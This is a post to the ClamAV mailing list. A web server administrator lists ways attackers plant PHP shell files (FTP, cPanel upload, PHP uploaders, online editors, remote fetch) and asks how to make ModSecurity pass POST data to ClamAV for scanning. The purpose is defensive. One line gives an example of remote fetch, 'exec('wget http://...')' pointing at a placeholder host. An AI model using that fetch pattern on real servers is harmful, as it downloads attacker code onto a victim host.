Dear all , all you know about the new methods of attack like phpshell code ,
and the old methods like iframe attack
i did scan all upload files via pure-ftp , Cpanel Uploader , and PHP upload
.

But what if the attacker , open an php editor , put the virus code in the
editor , hit submit . the code will stored in the server , with no sound :)
I know that if i scan the server i will have a report about it , but the bad
news that the hacker will attack an do his job , then i will see "Oh there
is a hacking file here "


i think that we have 5 way to place a file on the server.

1- FTP
2- Upload via Cpanel
3- PHP Uploader
4- Write the vireos code to the file via "Cpanel / PHP editor "
5- get the virus file via HTTP request by PHP "file_get_content(),
exec('wget http://www.foooooo') ", or via CURL

the most common ways is 1 - 2 - 3 .
but i notes on my server that hacker kip getting smarter .
he start using method " 4 " and i am sure he will move to method 5

So what do you think about that ? i know that there is a program name : "
ModSecurity  "  and i can scan the post but how can i tell ModSecurity   to
use clamAV that what i dont know . there is a method to scan the uploaded
file by ModSecurity  , but that is not my goal , i need to scan the post
data , not the POST uploaded files
_______________________________________________
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://www.clamav.net/support/ml

Reply via email to